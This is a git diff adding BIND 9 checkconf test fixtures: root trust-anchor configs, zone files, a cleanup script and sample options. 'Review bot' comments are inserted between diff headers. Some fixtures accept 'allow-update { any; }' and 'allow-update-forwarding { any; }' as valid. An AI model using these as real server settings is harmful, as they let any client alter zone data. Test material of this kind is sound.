new file mode 100644
index 0000000..d422635
--- /dev/null
+++ b/bin/tests/system/checkconf/check-root-ksk-2010.conf
@@ -0,0 +1,26 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ # This key (19036) is to be phased out starting in 2017. It will
+ # remain in the root zone for some time after its successor key
+ # has been added. It will remain this file until it is removed from
+ # the root zone.
+ . initial-key 257 3 8 "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF
+ FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX
+ bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD
+ X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz
+ W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS
+ Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq
+ QxA+Uk1ihz0=";
+};
diff --git a/bin/tests/system/checkconf/check-root-ksk-2017.conf b/bin/tests/system/checkconf/check-root-ksk-2017.conf
new file mode 100644
index 0000000..72f6fb4
--- /dev/null
+++ b/bin/tests/system/checkconf/check-root-ksk-2017.conf
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ # This key (20326) was published in the root zone in 2017.
+ # Servers which were already using the old key (19036) should
+ # roll seamlessly to this new one via RFC 5011 rollover. Servers
+ # being set up for the first time can use the contents of this
+ # file as initializing keys; thereafter, the keys in the
+ # managed key database will be trusted and maintained
+ # automatically.
+ . initial-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3
+ +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv
+ ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF
+ 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e
+ oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd
+ RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN
+ R1AkUTV74bU=";
+};
diff --git a/bin/tests/system/checkconf/check-root-ksk-both.conf b/bin/tests/system/checkconf/check-root-ksk-both.conf
new file mode 100644
index 0000000..88c308f
--- /dev/null
+++ b/bin/tests/system/checkconf/check-root-ksk-both.conf
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ # This key (19036) is to be phased out starting in 2017. It will
+ # remain in the root zone for some time after its successor key
+ # has been added. It will remain this file until it is removed from
+ # the root zone.
+ . initial-key 257 3 8 "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF
+ FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX
+ bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD
+ X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz
+ W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS
+ Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq
+ QxA+Uk1ihz0=";
+
+ # This key (20326) was published in the root zone in 2017.
+ # Servers which were already using the old key (19036) should
+ # roll seamlessly to this new one via RFC 5011 rollover. Servers
+ # being set up for the first time can use the contents of this
+ # file as initializing keys; thereafter, the keys in the
+ # managed key database will be trusted and maintained
+ # automatically.
+ . initial-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3
+ +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv
+ ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF
+ 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e
+ oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd
+ RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN
+ R1AkUTV74bU=";
+};
diff --git a/bin/tests/system/checkconf/check-root-static-ds.conf b/bin/tests/system/checkconf/check-root-static-ds.conf
new file mode 100644
index 0000000..eb37b85
--- /dev/null
+++ b/bin/tests/system/checkconf/check-root-static-ds.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ . static-ds 20326 8 2 "E06D44B80B8F1D39A95C0B0D7C65D08458E880409BBC683457104237C7F8EC8D";
+};
diff --git a/bin/tests/system/checkconf/check-root-static-key.conf b/bin/tests/system/checkconf/check-root-static-key.conf
new file mode 100644
index 0000000..7be5304
--- /dev/null
+++ b/bin/tests/system/checkconf/check-root-static-key.conf
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ # This key (20326) was published in the root zone in 2017.
+ # Servers which were already using the old key (19036) should
+ # roll seamlessly to this new one via RFC 5011 rollover. Servers
+ # being set up for the first time can use the contents of this
+ # file as initializing keys; thereafter, the keys in the
+ # managed key database will be trusted and maintained
+ # automatically.
+ . static-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3
+ +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv
+ ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF
+ 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e
+ oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd
+ RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN
+ R1AkUTV74bU=";
+};
diff --git a/bin/tests/system/checkconf/check-root-trusted-key.conf b/bin/tests/system/checkconf/check-root-trusted-key.conf
new file mode 100644
index 0000000..65261a8
--- /dev/null
+++ b/bin/tests/system/checkconf/check-root-trusted-key.conf
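Review bot: The comment in check-root-static-key.conf contradicts the entry below it: it describes RFC 5011 rollover and keys being "trusted and maintained automatically", but the anchor is declared as `static-key`, which is not rolled over that way. check-root-trusted-key.conf carries the same comment above a `trusted-keys` entry. Anyone copying from these fixtures could take a statically configured root anchor to be self-updating, so I would replace the comment in both files with something like `# Root KSK 20326 configured as a static trust anchor; it is not maintained via RFC 5011.`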
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trusted-keys {
+ # This key (20326) was published in the root zone in 2017.
+ # Servers which were already using the old key (19036) should
+ # roll seamlessly to this new one via RFC 5011 rollover. Servers
+ # being set up for the first time can use the contents of this
+ # file as initializing keys; thereafter, the keys in the
+ # managed key database will be trusted and maintained
+ # automatically.
+ . 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3
+ +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv
+ ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF
+ 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e
+ oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd
+ RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN
+ R1AkUTV74bU=";
+};
diff --git a/bin/tests/system/checkconf/check-srv-cname-fail.conf b/bin/tests/system/checkconf/check-srv-cname-fail.conf
new file mode 100644
index 0000000..e5f9349
--- /dev/null
+++ b/bin/tests/system/checkconf/check-srv-cname-fail.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ check-integrity yes; // default is yes
+};
+
+zone "check-srv-cname" {
+ type master;
+ file "check-srv-cname.db";
+ check-srv-cname fail;
+};
diff --git a/bin/tests/system/checkconf/check-srv-cname.db b/bin/tests/system/checkconf/check-srv-cname.db
new file mode 100644
index 0000000..0671ab1
--- /dev/null
+++ b/bin/tests/system/checkconf/check-srv-cname.db
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600 ; 10 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ MX 10 mail
+
+mail A 10.0.0.1
+ns2 A 10.53.0.2
+
+check-srv-cname SRV 1 2 3 target
+; SRV points to a CNAME which is detected by check-srv-cname configuration
+target CNAME mail
diff --git a/bin/tests/system/checkconf/check-wildcard-no.conf b/bin/tests/system/checkconf/check-wildcard-no.conf
new file mode 100644
index 0000000..beb641a
--- /dev/null
+++ b/bin/tests/system/checkconf/check-wildcard-no.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "check-wildcard" {
+ type primary;
+ file "check-wildcard.db";
+ check-wildcard no;
+};
diff --git a/bin/tests/system/checkconf/check-wildcard.conf b/bin/tests/system/checkconf/check-wildcard.conf
new file mode 100644
index 0000000..263f8b4
--- /dev/null
+++ b/bin/tests/system/checkconf/check-wildcard.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "check-wildcard" {
+ type primary;
+ file "check-wildcard.db";
+ check-wildcard yes;
+};
diff --git a/bin/tests/system/checkconf/check-wildcard.db b/bin/tests/system/checkconf/check-wildcard.db
new file mode 100644
index 0000000..1db5af0
--- /dev/null
+++ b/bin/tests/system/checkconf/check-wildcard.db
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600 ; 10 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+; an interior wildcard name
+foo.* TXT The owner name contains an interior wildcard
diff --git a/bin/tests/system/checkconf/clean.sh b/bin/tests/system/checkconf/clean.sh
new file mode 100644
index 0000000..0d6001d
--- /dev/null
+++ b/bin/tests/system/checkconf/clean.sh
@@ -0,0 +1,25 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f bad-kasp-keydir1.conf
+rm -f bad-kasp-keydir2.conf
+rm -f bad-kasp-keydir3.conf
+rm -f bad-kasp-keydir4.conf
+rm -f bad-kasp-keydir5.conf
+rm -f checkconf.out*
+rm -f diff.out*
+rm -f good-kasp.conf.in
+rm -f good-server-christmas-tree.conf
+rm -f good.conf.in good.conf.out badzero.conf *.out
+rm -f ns*/named.lock
+rm -rf test.keydir
diff --git a/bin/tests/system/checkconf/deprecated-masterfile-format-map.conf b/bin/tests/system/checkconf/deprecated-masterfile-format-map.conf
new file mode 100644
index 0000000..634ca14
--- /dev/null
+++ b/bin/tests/system/checkconf/deprecated-masterfile-format-map.conf
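Review bot: In clean.sh, `rm -f good.conf.in good.conf.out badzero.conf *.out` names `good.conf.out` and then removes every `*.out` in the working directory anyway, so the explicit name is redundant and the glob is wider than the list of generated files above it suggests; `rm -f good.conf.in badzero.conf *.out` says the same thing. Every path is relative, including `rm -rf test.keydir`, so the script only removes the intended files when it is run from the checkconf test directory, and the caller is not visible in this hunk. I would state that at the top with `# Must be run from the checkconf test directory; removes generated test output only.`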
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { ::1; };
+ masterfile-format map;
+};
diff --git a/bin/tests/system/checkconf/deprecated.conf b/bin/tests/system/checkconf/deprecated.conf
new file mode 100644
index 0000000..82a555d
--- /dev/null
+++ b/bin/tests/system/checkconf/deprecated.conf
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+server 1.2.3.4 {
+ query-source 10.10.10.10 dscp 10;
+};
+
+options {
+ dnssec-validation yes;
+ dscp 10;
+};
+
+trusted-keys {
+ fake.trusted. 257 3 8
+ "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF
+ FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX
+ bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD
+ X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz
+ W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS
+ Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq
+ QxA+Uk1ihz0=";
+};
+
+managed-keys {
+ fake.managed. initial-key 257 3 8
+ "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3
+ +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv
+ ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF
+ 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e
+ oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd
+ RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN
+ R1AkUTV74bU=";
+};
diff --git a/bin/tests/system/checkconf/dlz-bad.conf b/bin/tests/system/checkconf/dlz-bad.conf
new file mode 100644
index 0000000..b279ccf
--- /dev/null
+++ b/bin/tests/system/checkconf/dlz-bad.conf
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dlz one {
+ database "one";
+};
+
+dlz two {
+ database "two";
+ search no;
+};
+
+zone master {
+ type master;
+ database "none";
+ dlz two;
+};
diff --git a/bin/tests/system/checkconf/dnssec.1 b/bin/tests/system/checkconf/dnssec.1
new file mode 100644
index 0000000..ac79651
--- /dev/null
+++ b/bin/tests/system/checkconf/dnssec.1
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnssec-enable no;
+};
diff --git a/bin/tests/system/checkconf/dnssec.2 b/bin/tests/system/checkconf/dnssec.2
new file mode 100644
index 0000000..6eaa372
--- /dev/null
+++ b/bin/tests/system/checkconf/dnssec.2
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view view1 {
+ match-clients { any; };
+ dnssec-validation yes;
+};
+
+view view2 {
+ match-clients { none; };
+ dnssec-validation auto;
+};
+
+view view3 {
+ match-clients { none; };
+ auto-dnssec maintain;
+};
diff --git a/bin/tests/system/checkconf/dnssec.3 b/bin/tests/system/checkconf/dnssec.3
new file mode 100644
index 0000000..93b6ac2
--- /dev/null
+++ b/bin/tests/system/checkconf/dnssec.3
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view view1 {
+ match-clients { any; };
+};
+
+view view2 {
+ match-clients { none; };
+};
+
+view view3 {
+ match-clients { none; };
+ dnssec-validation auto;
+};
+
+view view4 {
+ match-clients { none; };
+};
+
+view view5 {
+ match-clients { none; };
+ auto-dnssec off;
+};
diff --git a/bin/tests/system/checkconf/dnssec.4 b/bin/tests/system/checkconf/dnssec.4
new file mode 100644
index 0000000..53e5d91
--- /dev/null
+++ b/bin/tests/system/checkconf/dnssec.4
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "test" {
+ type primary;
+ file "test.db";
+ auto-dnssec maintain;
+};
diff --git a/bin/tests/system/checkconf/good-acl.conf b/bin/tests/system/checkconf/good-acl.conf
new file mode 100644
index 0000000..be32923
--- /dev/null
+++ b/bin/tests/system/checkconf/good-acl.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl a {
+ { "none"; };
+ { !19.0.0.0/8; };
+};
+
+options {
+ allow-query { a; };
+};
diff --git a/bin/tests/system/checkconf/good-allow-update-forwarding-view.conf b/bin/tests/system/checkconf/good-allow-update-forwarding-view.conf
new file mode 100644
index 0000000..5bc9232
--- /dev/null
+++ b/bin/tests/system/checkconf/good-allow-update-forwarding-view.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ allow-update-forwarding { any; };
+};
diff --git a/bin/tests/system/checkconf/good-allow-update-forwarding.conf b/bin/tests/system/checkconf/good-allow-update-forwarding.conf
new file mode 100644
index 0000000..d7e89be
--- /dev/null
+++ b/bin/tests/system/checkconf/good-allow-update-forwarding.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ allow-update-forwarding { any; };
+};
diff --git a/bin/tests/system/checkconf/good-allow-update-view.conf b/bin/tests/system/checkconf/good-allow-update-view.conf
new file mode 100644
index 0000000..da799a2
--- /dev/null
+++ b/bin/tests/system/checkconf/good-allow-update-view.conf
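Review bot: `allow-update-forwarding { any; };` in good-allow-update-forwarding-view.conf and good-allow-update-forwarding.conf is filed as a passing configuration with no comment saying the file is a syntax fixture only; the same holds for `allow-update { any; };` in good-allow-update-view.conf and good-allow-update.conf, which follow in this commit. An ACL of `any` on dynamic updates or update forwarding accepts change requests from every client that can reach the server, so these files should not read as examples. I would add one line above each block, e.g. `/* checkconf fixture: 'any' is accepted at this level; not a recommended ACL */`, and state there whether a warning is expected, which cannot be told from the hunk.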
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ allow-update { any; };
+};
diff --git a/bin/tests/system/checkconf/good-allow-update.conf b/bin/tests/system/checkconf/good-allow-update.conf
new file mode 100644
index 0000000..6b7a67e
--- /dev/null
+++ b/bin/tests/system/checkconf/good-allow-update.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ allow-update { any; };
+};
diff --git a/bin/tests/system/checkconf/good-class.conf b/bin/tests/system/checkconf/good-class.conf
new file mode 100644
index 0000000..2f8c321
--- /dev/null
+++ b/bin/tests/system/checkconf/good-class.conf
@@ -0,0 +1,14 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view "example" class00 { };
diff --git a/bin/tests/system/checkconf/good-dnskey-validity-3660.conf b/bin/tests/system/checkconf/good-dnskey-validity-3660.conf
new file mode 100644
index 0000000..4e0a7ee
--- /dev/null
+++ b/bin/tests/system/checkconf/good-dnskey-validity-3660.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnskey-sig-validity 3660; /* maximum value 10 years */
+};
diff --git a/bin/tests/system/checkconf/good-dnskey-validity-zero.conf b/bin/tests/system/checkconf/good-dnskey-validity-zero.conf
new file mode 100644
index 0000000..5da41b8
--- /dev/null
+++ b/bin/tests/system/checkconf/good-dnskey-validity-zero.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnskey-sig-validity 0; /* 0 is disabled */
+};
diff --git a/bin/tests/system/checkconf/good-ds-key-1.conf b/bin/tests/system/checkconf/good-ds-key-1.conf
new file mode 100644
index 0000000..de7de84
--- /dev/null
+++ b/bin/tests/system/checkconf/good-ds-key-1.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
